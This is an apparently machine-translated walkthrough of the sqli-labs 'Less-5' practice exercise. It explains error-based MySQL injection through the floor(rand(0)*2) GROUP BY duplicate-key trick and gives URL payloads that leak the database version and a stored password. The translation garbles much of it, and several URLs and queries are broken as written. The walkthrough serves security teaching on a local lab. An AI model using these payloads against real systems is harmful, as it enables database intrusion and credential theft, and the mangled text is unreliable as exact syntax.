Less 5 experiment is: character, single quotes, error injection, double injection
First, enter: HTTP: // localhost / Less-5 / the above mentioned id = 1? 'Error:
Input: HTTP: // localhost /. 5-Less / ID. 1 =? '=. 1%. 1 and 23 is and HTTP:? // localhost /. 5-Less / ID. 1 = ' = 2%. 1 and 23 is, return to normal page:
Here is almost certain character injection, but not the same and Less1 is not normal echo page, the error message only error page, which is a character, an error injection. So this is a new kind of a situation.
We must first look at what is being given the injection. We see in the source code is a function of the error echo mysql_error ()
mysql_error () function returns the text of the error message MySQL operation, the operation can be estimated character query:
$ SQL = "the SELECT * the FROM Users the WHERE ID = '$ ID' the LIMIT 0,1";
Next we introduce error injection. We use the function floor () and the rand () function to learn, wherein:
the role of the floor function returns is less than or equal to the maximum integer value, can be understood as rounding down, leaving only the integer portion.
rand () function can be used to generate 0 or 1, but RAND (0) and rand () is essentially different, RAND (0) is equivalent to the rand () function is passed a parameter, rand () function in accordance with 0 to the parameter to the random number. rand () generated number is completely random, and the rand (0) is regularly generated, we can try in the database. First test rand ()
Log on to our specific sqli-labs database command line, look at the use and presentation of these two functions:
the SELECT Floor (RAND () * 2) from the mysql.user;
select floor(rand(0)*2) from mysql.user;
Here we have repeatedly execute the above two statements, you will find rand (0) is actually a pseudo-random, each time the results are the same.
Next we execute the statement:
the SELECT COUNT ( ), concat ((Floor (RAND () 2)), ';', (the SELECT Version ())) name from the mysql.user Group by name;
this statement has been correct export
COUNT SELECT ( ), the concat ((Floor (RAND (0) 2)), ';', (SELECT Version ())) from the mysql.user Group name by name;
and this statement will be given the information that the error of The reason is:
mean group_key duplicate entries. We use group by group query, the database will generate a virtual table, in this virtual table, group by the back of the field as the primary key, so this table the primary key is a name, so we basically understood the reasons being given the the reason is mainly because the primary key of the virtual table repetition. According to MySQL's official statement, group by operations to be performed twice, the first time is to take the group by value behind the field before the virtual table to contrast, to obtain first group by value behind; the second is the assumption behind the group by value of the field does not exist in the virtual table, then it needs to be inserted into the virtual tables, where when inserted executes the second calculation, since there is a certain randomness rand function, the result of the second operation may the first result of the operation is inconsistent, but the result of the operation may already exist in the virtual table, then the time will inevitably lead to the insertion of duplicate primary keys, and then throws an error.
At the same time we see here in the error message with sensitive information, that is, select version () database version displayed.
We put this statement into the page up operation:
HTTP: // localhost / Less-5 / the above mentioned id = 1? 'Of Union the SELECT COUNT ( ), 1, concat ((Floor (RAND (0) 2)),'; ', (select version ())) name from mysql.user group by name;% 23
Here we see the version number of the database storm out.
We can also look at user list storms password
? HTTP: // localhost / Less-5 / the above mentioned id = 1 'of Union the SELECT COUNT ( ), 1, concat ((Floor (RAND (0) 2)),'; ', (select password from users limit 1,1) ) name from mysql.user group by name;% 23
